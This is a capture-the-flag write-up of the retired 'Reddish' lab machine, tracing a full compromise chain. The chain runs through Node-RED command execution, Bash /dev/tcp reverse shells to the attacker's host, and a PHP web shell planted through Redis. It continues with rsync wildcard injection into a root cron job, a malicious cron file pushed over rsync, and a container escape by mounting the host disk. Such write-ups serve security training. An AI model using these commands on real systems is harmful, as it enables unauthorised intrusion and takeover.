
Reddish

Box details
OS Linux
Difficulty Insane
Status Retired
Release July 2018
Completed September 2025

Enumeration

Started by enumerating the target with Nmap to discover open ports and running services. Only a single open TCP port was discovered:

$ nmap -sV -sC -p- -PN -oA reddish_nmap 10.10.10.94
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-23 16:06 CEST
Nmap scan report for 10.10.10.94
Host is up (0.066s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
1880/tcp open  http    Node.js Express framework
|_http-title: Error

Scanned the target for common open UDP ports, but found none.
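The UDP sweep looked something like this (a representative invocation, not necessarily the exact options used):

$ sudo nmap -sU --top-ports 100 10.10.10.94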

Attempting to navigate to the web server on port 1880 only returns an error message:

[Image: the error message returned by the web server]

The error message refers to a GET request. Changing the request type to POST returns a JSON object:

$ curl -X POST 10.10.10.94:1880
{"id":"caa395f52cdd8ec38369d4b50d25fe6a","ip":"::ffff:10.10.16.3","path":"/red/{id}"}

The path in the JSON object hints at a possible URL: http://10.10.10.94:1880/red/caa395f52cdd8ec38369d4b50d25fe6a. Navigating to this URL reveals a Node-RED UI:

[Image: the Node-RED web UI]

Foothold

Node-RED is a framework for visual programming. Through the web UI, functional blocks, called nodes, can be connected together to build application flows that accept external input, execute functions and deliver output.

Among the nodes available in the UI, there is an exec node that allows users to run system commands. The description reads:

Runs a system command and returns its output.

The node can be configured to either wait until the command completes, or to send its output as the command generates it.

The command that is run can be configured in the node or provided by the received message.

This is an obvious candidate for running arbitrary commands on the target. A reverse shell for Node-RED can be found here. Importing it into the web UI produces the following flow:

[Image: the imported reverse shell flow in the Node-RED UI]

Stood up a Netcat listener, deployed the flow, and got a callback as root:

$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.10.94 48724

[object Object]id
uid=0(root) gid=0(root) groups=0(root)

Although this is a root shell, it spawned inside a Docker container:

[object Object]ls -la /
total 80
drwxr-xr-x   1 root root 4096 Jul 15  2018 .
drwxr-xr-x   1 root root 4096 Jul 15  2018 ..
-rwxr-xr-x   1 root root    0 May  4  2018 .dockerenv
...

The output from mount shows a few configuration files mounted from the host file system:

[object Object]mount
...
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
...

The container is also dual-homed with network interfaces on both 172.18.0.0/16 and 172.19.0.0/16:

[object Object]ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
13: eth1@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:13:00:03 brd ff:ff:ff:ff:ff:ff
    inet 172.19.0.3/16 brd 172.19.255.255 scope global eth1
       valid_lft forever preferred_lft forever
17: eth0@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0
       valid_lft forever preferred_lft forever

To further enumerate the container and the network, a better reverse shell is needed. The initial shell can be upgraded by standing up a new Netcat listener and spawning a Bash shell that connects to it like so:

[object Object]bash -c "/bin/bash -i >& /dev/tcp/10.10.16.3/9002 0>&1"

Network Enumeration

Over in the new reverse Bash shell, a quick way to enumerate the two networks is by running a ping sweep:

root@nodered:/node-red# for i in {1..254} ;do (ping -c 1 172.18.0.$i | grep "bytes from" &) ;done
64 bytes from 172.18.0.1: icmp_seq=1 ttl=64 time=0.060 ms
64 bytes from 172.18.0.2: icmp_seq=1 ttl=64 time=0.023 ms
root@nodered:/node-red# for i in {1..254} ;do (ping -c 1 172.19.0.$i | grep "bytes from" &) ;done
64 bytes from 172.19.0.1: icmp_seq=1 ttl=64 time=0.067 ms
64 bytes from 172.19.0.2: icmp_seq=1 ttl=64 time=0.040 ms
64 bytes from 172.19.0.3: icmp_seq=1 ttl=64 time=0.019 ms
64 bytes from 172.19.0.4: icmp_seq=1 ttl=64 time=0.082 ms

Not counting the gateway and IP addresses belonging to the current container, two more hosts were discovered on the 172.19.0.0/16 network: 172.19.0.2 and 172.19.0.4.

Without access to a proper network scanner like Nmap, enumerating open ports on the other containers requires a more basic approach. One way of doing it is by writing directly to TCP sockets using Bash's /dev/tcp pseudo-device. If a port is open, the write succeeds; if not, it returns an error. For instance:

root@nodered:/node-red# echo "test" > /dev/tcp/172.19.0.2/80
echo "test" > /dev/tcp/172.19.0.2/80
bash: connect: Connection refused
bash: /dev/tcp/172.19.0.2/80: Connection refused
root@nodered:/node-red# echo "test" > /dev/tcp/172.19.0.4/80
echo "test" > /dev/tcp/172.19.0.4/80

This can be automated with a simple Bash script:

# Sweep all 65535 TCP ports on each live host using Bash's /dev/tcp device
for ip in 172.19.0.2 172.19.0.4; do
    for port in $(seq 1 65535); do
        # A successful redirect means the port accepted the TCP connection
        (echo "test" > /dev/tcp/$ip/$port && echo "$ip:$port - open") 2>/dev/null
    done
done

Running the script on the target reveals two open ports, one on each of the two containers:

root@nodered:/node-red# for ip in 172.19.0.2 172.19.0.4; do
...
172.19.0.2:6379 - open
172.19.0.4:80 - open

TCP/6379 is the default port for Redis. Given that the container on 172.19.0.4 likely runs a web server on port 80, it makes sense that the container on 172.19.0.2 could be its database backend.

As the Node-RED container doesn't have any tools for interacting with the services on the other containers, this has to be done from the attack host through pivoting.

Pivot to the www Container

The web server container (www) is a good place to start. The first step is to decide on a pivoting tool and get it stood up on the attack host and target.

One such pivoting tool is Ligolo-ng. Unlike most pivoting tools, Ligolo-ng works more like a C2 framework: a central server runs on the attack host, and one or more agents are deployed on the pivot hosts. It's also intuitive and relatively easy to manage through both a CLI and a web UI.

The limited environment in the container also means that the agent has to be transferred using only what's available in Bash. Again using a raw TCP socket, this can be achieved by serving the file from a Netcat listener on the attack host and reading it from the socket on the target:

  • On the attack host:
    $ nc -lnvp 8000 < agent_linux
    Listening on 0.0.0.0 8000
    Connection received on 10.10.10.94 37770
    
  • On the target:
    root@nodered:/node-red# bash -c "cat < /dev/tcp/10.10.16.3/8000 > agent_linux"
    

Note

While simple to set up, there is no progress feedback and the connection remains open even after the transfer finishes. The only way to make sure the file transferred successfully is to compare the file hashes of the source file and the received file.
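For instance, with md5sum (assuming it's available on both ends):

# On the attack host
$ md5sum agent_linux

# In the container; the hashes should match
root@nodered:/node-red# md5sum agent_linux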

Once the server is up, the agent is connected back to it and a route to 172.19.0.0/16 is configured.
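The setup looks roughly like this (a sketch assuming a recent Ligolo-ng release with built-in interface management; the interface name ligolo is arbitrary):

# On the attack host: start the Ligolo-ng server with a self-signed certificate
$ ./proxy -selfcert

# On the Node-RED container: launch the agent
root@nodered:/node-red# ./agent_linux -connect 10.10.16.3:11601 -ignore-cert &

# In the Ligolo-ng CLI: create a TUN interface, start the tunnel and add the route
ligolo-ng » interface_create --name ligolo
ligolo-ng » session
? Specify a session : 1 - root@nodered - 10.10.10.94:59016 - 0242ac130003
[Agent : root@nodered] » tunnel_start --tun ligolo
[Agent : root@nodered] » route_add --name ligolo --route 172.19.0.0/16

With the route in place, the web server on 172.19.0.4:80 can be accessed directly from the attack host: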

[Image: the website hosted on 172.19.0.4]

Though the site isn't much to look at, the page contains an embedded JavaScript snippet:

...
<script type="text/javascript">
                $(document).ready(function () {
                        incrCounter();
                    getData();
                });

                function getData() {
                    $.ajax({
                        url: "8924d0549008565c554f8128cd11fda4/ajax.php?test=get hits",
                        cache: false,
                        dataType: "text",
                        success: function (data) {
                                    console.log("Number of hits:", data)
                        },
                        error: function () {
                        }
                    });
                }

                function incrCounter() {
                    $.ajax({
                        url: "8924d0549008565c554f8128cd11fda4/ajax.php?test=incr hits",
                        cache: false,
                        dataType: "text",
                        success: function (data) {
                        console.log("HITS incremented:", data);
                        },
                        error: function () {
                        }
                    });
                }

                /*
                    * TODO
                    *
                    * 1. Share the web folder with the database container (Done)
                    * 2. Add here the code to backup databases in /f187a0ec71ce99642e4f0afbd441a68b folder
                    * ...Still don't know how to complete it...
                */
                function backupDatabase() {
                        $.ajax({
                                url: "8924d0549008565c554f8128cd11fda4/ajax.php?backup=...",
                                cache: false,
                                dataType: "text",
                                success: function (data) {
                                    console.log("Database saved:", data);
                                },
                                error: function () {
                                }
                        });
                }
</script>
...

At first glance, the script's purpose appears to be a counter for the number of times the site has been visited. There is also a backupDatabase() function for backing up the count, which is presumably stored in the Redis database on the other container.

The Redis instance can be interacted with using the dedicated redis-cli tool, or simply using Netcat. As the Ligolo-ng tunnel is already set up for the correct network, the container and the Redis instance can be reached by setting the host address to 172.19.0.2:

$ redis-cli -h 172.19.0.2
172.19.0.2:6379> info
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:cce7cc41d26597f7
redis_mode:standalone
os:Linux 4.15.0-213-generic x86_64
...

Tip

As it turns out, the web application running on the other container is a direct interface to the Redis CLI. Passing a Redis command to the test parameter will execute the command on the database backend:

$ curl "http://172.19.0.4/8924d0549008565c554f8128cd11fda4/ajax.php?test=info"
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:cce7cc41d26597f7
redis_mode:standalone
os:Linux 4.15.0-213-generic x86_64
...

As explained in this guide, access to the Redis CLI can be abused to gain RCE through a simple PHP web shell. The only requirement is a web server running PHP, and as briefly mentioned in one of the comments in the web application source code above, the web directory (/var/www/html/8924d0549008565c554f8128cd11fda4) is shared between the database container and the web server.

Following the guide above, the web shell is stood up like so:

$ redis-cli -h 172.19.0.2
172.19.0.2:6379> set pwn "<?php system($_REQUEST['cmd']); ?>"
OK
172.19.0.2:6379> config set dbfilename shell.php
OK
172.19.0.2:6379> config set dir /var/www/html/8924d0549008565c554f8128cd11fda4
OK
172.19.0.2:6379> save
OK

Accessing the shell through the www container confirms RCE:

 $ curl "http://172.19.0.4/8924d0549008565c554f8128cd11fda4/shell.php?cmd=id" --output -
REDIS0008       redis-ver4.0.9
redis-bits@ctime3used-mem¨

                          aof-preamblepwn"uid=33(www-data) gid=33(www-data) groups=33(www-data)

With RCE in place, the next step is to get a reverse shell on www. However, unlike the Node-RED container, this container has no route back to the attack host, so a reverse shell can't connect directly. Instead, the solution is to set up a double pivot using the Node-RED container as a relay for the reverse shell connection.

The double pivot can be set up with Ligolo-ng by starting an additional TCP listener on the agent running on the Node-RED container and pointing it at a free port on the attack host, where Netcat is running in listener mode. A PHP reverse shell on the web server that connects to the Node-RED container's listener is then forwarded through the tunnel to the attack host.

The connection setup at this point can be visualized like so:

[Image: diagram of the connection setup at this point]

The additional listener on the Node-RED container is stood up using the Ligolo-ng CLI:

ligolo-ng » session
? Specify a session : 1 - root@nodered - 10.10.10.94:59016 - 0242ac130003
[Agent : root@nodered] » listener_add --addr 0.0.0.0:9003 --to 127.0.0.1:9003
INFO[49568] Listener 1 created on remote agent!

Note

Ligolo-ng listeners can be set up to either connect back to the Ligolo-ng server (port 11601) for a double pivot, or to an arbitrary TCP/UDP port. In this case, as the server is accessible directly from 172.19.0.3, a direct connection to a TCP port is sufficient.

The reverse shell connection is triggered by sending a POST request to the PHP web shell running on www with the following payload:

bash -c "bash -i >& /dev/tcp/172.19.0.3/9003 0>&1"

This is easiest to achieve using a web proxy:

[Image: the POST request to the PHP web shell in a web proxy]
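Alternatively, the request can be sent with curl (a sketch, assuming the planted web shell reads the cmd parameter via $_REQUEST):

$ curl "http://172.19.0.4/8924d0549008565c554f8128cd11fda4/shell.php" \
    --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/172.19.0.3/9003 0>&1"'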

Got a callback in the Netcat listener on the attack host as www-data:

www-data@www:/var/www/html/8924d0549008565c554f8128cd11fda4$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation

Repeating the file system enumeration done on the Node-RED container shows that this container, too, has some file systems mounted from the host, including /home:

...
/dev/sda2 on /home type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/sda2 on /var/www/html type ext4 (rw,relatime,errors=remount-ro,data=ordered)
...

/home contains two users' home directories:

www-data@www:/$ ls -la /home
drwxr-xr-x 5 root root 4096 Apr  9  2021 .
drwxr-xr-x 1 root root 4096 Jul 15  2018 ..
drwxr-xr-x 2 1001 1001 4096 Jul 16  2018 bergamotto
drwx------ 2 root root 4096 Apr  1  2018 lost+found
drwxr-xr-x 2 1000 1000 4096 Jul 16  2018 somaro

Both home directories are readable, but neither contains anything of value except the user flag in /home/somaro. Unfortunately, the flag file itself isn't readable.

Enumerating the root of the file system reveals a /backup directory containing the following script:

backup.sh

cd /var/www/html/f187a0ec71ce99642e4f0afbd441a68b
rsync -a *.rdb rsync://backup:873/src/rdb/
cd / && rm -rf /var/www/html/*
rsync -a rsync://backup:873/src/backup/ /var/www/html/
chown www-data. /var/www/html/f187a0ec71ce99642e4f0afbd441a68b

The script is owned by root:root, but isn't executable. Instead, it's being called by a cron job in /etc/cron.d:

www-data@www:/var/www/html$ ls -l /backup
total 4
-rw-r--r-- 1 root root 242 May  4  2018 backup.sh
www-data@www:/var/www/html$ ls -l /etc/cron.d
total 4
-rw-r--r-- 1 root root 38 May  4  2018 backup
www-data@www:/var/www/html$ cat /etc/cron.d/backup
*/3 * * * * root sh /backup/backup.sh

The script uses rsync to back up Redis database files from /var/www/html/f187a0ec71ce99642e4f0afbd441a68b, but it does so by specifying the target .rdb files with an unquoted wildcard. The files are backed up to a remote host called backup, but this host isn't listed in /etc/hosts, and the container doesn't have any tools like host or dig to resolve its IP address. A workaround could have been to use ping, but www-data doesn't have the necessary permissions:

www-data@www:/$ ping -c 1 backup
ping: icmp open socket: Operation not permitted

In any case, the way the rsync command is written opens it up to wildcard injection. Specifically, rsync's -e option specifies the remote shell program to use, so a filename that expands into -e tricks rsync into executing an arbitrary command. Longer payloads can be placed in a script file with an .rdb extension and triggered by creating an empty file named '-e sh <script>.rdb'.
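To see why this works, consider roughly what the shell hands to rsync once *.rdb is expanded (a hypothetical expansion using the files from the example below):

# The glob matches every filename ending in .rdb, including the planted one:
rsync -a '-e sh test.rdb' test.rdb rsync://backup:873/src/rdb/
# rsync parses the first "filename" as its -e (remote shell) option
# and ends up executing: sh test.rdb

The following example illustrates the idea: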

The script can be created on the attack host with a proper editor and saved to something like test.rdb:

$ cat test.rdb
#!/bin/sh

touch /tmp/test.txt

Next, it can be transferred to the target by setting up a new Ligolo-ng listener, then hosting the file with Netcat like so:

$ nc -lnvp 9004 < test.rdb
Listening on 0.0.0.0 9004

On the target, the file can be downloaded by reading it from a raw socket:

www-data@www:/var/www/html/f187a0ec71ce99642e4f0afbd441a68b$ cat < /dev/tcp/172.19.0.3/9004 > test.rdb

Once transferred, the specially named empty file that injects the -e option is created like so:

www-data@www:/var/www/html/f187a0ec71ce99642e4f0afbd441a68b$ touch -- '-e sh test.rdb'

/tmp/test.txt is created within the three-minute window defined in the cron job:

www-data@www:/var/www/html/f187a0ec71ce99642e4f0afbd441a68b$ ls -l /tmp
-rw-r--r-- 1 root     root     0 Sep 24 14:57 test.txt

From here, there are several ways of getting root on www. One way is to stand up yet another reverse shell by replacing the payload above with the following:

$ cat pwn.rdb
#!/bin/sh
bash -c "bash -i >& /dev/tcp/172.19.0.3/9004 0>&1"

Once the cron job fired, the restarted Netcat listener received a reverse shell as root:

$ nc -lnvp 9004
Listening on 0.0.0.0 9004
Connection received on 127.0.0.1 48070
root@www:/var/www/html/f187a0ec71ce99642e4f0afbd441a68b# id
uid=0(root) gid=0(root) groups=0(root)

With root access to the container, the user flag in /home/somaro is readable.

Root access also makes it possible to find the backup host's IP address using ping:

root@www:~# ping -c 1 backup
PING backup (172.20.0.2) 56(84) bytes of data.
64 bytes from reddish_composition_backup_1.reddish_composition_internal-network-2 (172.20.0.2): icmp_seq=1 ttl=64 time=0.074 ms

--- backup ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.074/0.074/0.074/0.000 ms

Going back to the backup script from earlier, the rsync command can be modified to exfiltrate files from backup. For instance, /etc/passwd is exfiltrated like so:

root@www:~# rsync -avz rsync://backup:873/src/etc/passwd .
receiving incremental file list
passwd

sent 43 bytes  received 543 bytes  390.67 bytes/sec
total size is 1,197  speedup is 2.04
root@www:~# cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false

Note

Note the use of /src/ in the path above: all files are addressed through the rsync daemon's src module, which is rooted at / on backup. The daemon doesn't accept absolute host paths and sanitizes directory-traversal attempts, so everything must be referenced relative to the module.
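The module layout can be checked with standard rsync daemon listing syntax:

# List the modules exposed by the rsync daemon on backup
root@www:~# rsync rsync://backup:873/

# List a directory inside the src module (rooted at / on backup)
root@www:~# rsync rsync://backup:873/src/etc/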

Pivot to backup

The next step is getting code execution on the backup host. Since this target is only accessible from the www container, this requires yet another pivot and yet another reverse shell. Unlike in the previous case with the reverse shell from www going over the Node-RED container, this setup requires an additional Ligolo-ng agent on www to act as a proxy.

The agent can be transferred to www using Netcat and raw sockets as shown in previous examples.
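Concretely, the transfer could look like this (a sketch; the forwarded port 9005 is an assumption):

# Attack host: serve the agent binary
$ nc -lnvp 9005 < agent_linux

# Ligolo-ng CLI: forward port 9005 on the Node-RED agent to the attack host
[Agent : root@nodered] » listener_add --addr 0.0.0.0:9005 --to 127.0.0.1:9005

# On www: pull the binary over the forwarded socket and make it executable
root@www:~# cat < /dev/tcp/172.19.0.3/9005 > agent_linux
root@www:~# chmod +x agent_linux

In order to connect the new agent to the Ligolo-ng server on the attack host, a new listener is needed: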

[Agent : root@nodered] » listener_add --addr 0.0.0.0:9006 --to 127.0.0.1:11601
INFO[78952] Listener 4 created on remote agent!

Since the goal is to connect the new agent to the Ligolo-ng server, the new listener is connected to Ligolo-ng's listening port (11601). The agent on www is started like so:

root@www:~# ./agent_linux -connect 172.19.0.3:9006 -ignore-cert &
time="2025-09-24T18:04:41Z" level=warning msg="warning, certificate validation disabled"
time="2025-09-24T18:04:41Z" level=info msg="Connection established" addr="172.19.0.3:9006"

The new connection is picked up by the Ligolo-ng server:

[Agent : root@nodered] » INFO[78972] Agent joined.                                
    id=0242ac130004 name=root@www remote="127.0.0.1:45886"

The next step is to set up an interface and route for the new agent on the Ligolo-ng server:

[Agent : root@nodered] » session
? Specify a session : 2 - root@www - 127.0.0.1:45886 - 0242ac130004
[Agent : root@www] » tunnel_start --tun salmonaustralia
INFO[79733] Starting tunnel to root@www (0242ac130004)
[Agent : root@www] » route_add --name salmonaustralia --route 172.20.0.0/16

With the tunnel up, 172.20.0.2 is directly accessible from the attack host:

$ ping 172.20.0.2
PING 172.20.0.2 (172.20.0.2) 56(84) bytes of data.
64 bytes from 172.20.0.2: icmp_seq=1 ttl=64 time=101 ms
64 bytes from 172.20.0.2: icmp_seq=2 ttl=64 time=104 ms
64 bytes from 172.20.0.2: icmp_seq=3 ttl=64 time=103 ms

--- 172.20.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 101.191/102.832/103.983/1.191 ms

The last step is to set up a listener on the new agent that can connect back to the attack host:

[Agent : root@www] » listener_add --addr 0.0.0.0:9007 --to 127.0.0.1:9007
INFO[81955] Listener 0 created on remote agent!

At this point, the network looks like this:

[Image: diagram of the network after the second pivot]

A reverse shell is within reach, but there is no direct way to run commands on backup from www, which makes this a challenge. One way around it is to leverage rsync to write a cron job onto backup and wait for it to trigger.

The cron job is simple enough:

echo '* * * * * root bash -c "bash -i >& /dev/tcp/172.20.0.3/9007 0>&1"' > revshell

The file can be transferred to backup with rsync:

root@www:~#  rsync revshell rsync://backup:873/src/etc/cron.d/revshell
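Before waiting for cron to fire, the upload can be verified with a daemon listing of the remote directory:

root@www:~# rsync rsync://backup:873/src/etc/cron.d/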

Got a callback in a Netcat listener as root:

$ nc -lnvp 9007
Listening on 0.0.0.0 9007
Connection received on 127.0.0.1 36624
root@backup:~# id
uid=0(root) gid=0(root) groups=0(root)

Privilege Escalation (root)

Similar to the containers encountered earlier, backup also has several file systems mounted from /dev/sda2:

root@backup:~# mount
...
/dev/sda2 on /backup type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)

/backup doesn't appear to have anything of interest:

root@backup:~# ls -l /backup
total 20
drwxr-xr-x 3 root root 4096 Jul 15  2018 8924d0549008565c554f8128cd11fda4
drwxr-xr-x 2 root root 4096 Jul 15  2018 assets
drwxr-xr-x 2 root root 4096 Jul 15  2018 f187a0ec71ce99642e4f0afbd441a68b
-rw-r--r-- 1 root root 2023 May  4  2018 index.html
-rw-r--r-- 1 root root   17 May  4  2018 info.php

However, having /dev/sda2 mounted directly into the container may be a hint that the container is privileged and allowed to mount host block devices. Assuming / on the host lives on /dev/sda2, mounting it to /mnt should only succeed if that's the case:

root@backup:~# mount /dev/sda2 /mnt
root@backup:~# ls -la /mnt
total 128
drwxr-xr-x  23 root root  4096 Dec  6  2023 .
drwxr-xr-x   1 root root  4096 Jul 15  2018 ..
drwxr-xr-x   2 root root 12288 Dec  6  2023 bin
drwxr-xr-x   2 root root  4096 Jul 15  2018 boot
drwxr-xr-x   4 root root  4096 Jul 15  2018 dev
drwxr-xr-x 100 root root 12288 Dec  6  2023 etc
drwxr-xr-x   5 root root  4096 Apr  9  2021 home
...

The absence of a .dockerenv file confirms that /mnt is actually the host's root file system, which also means:

root@backup:~# ls -l /mnt/root
total 4
-r-------- 1 root root 33 Sep 23 14:05 root.txt

Got the root flag.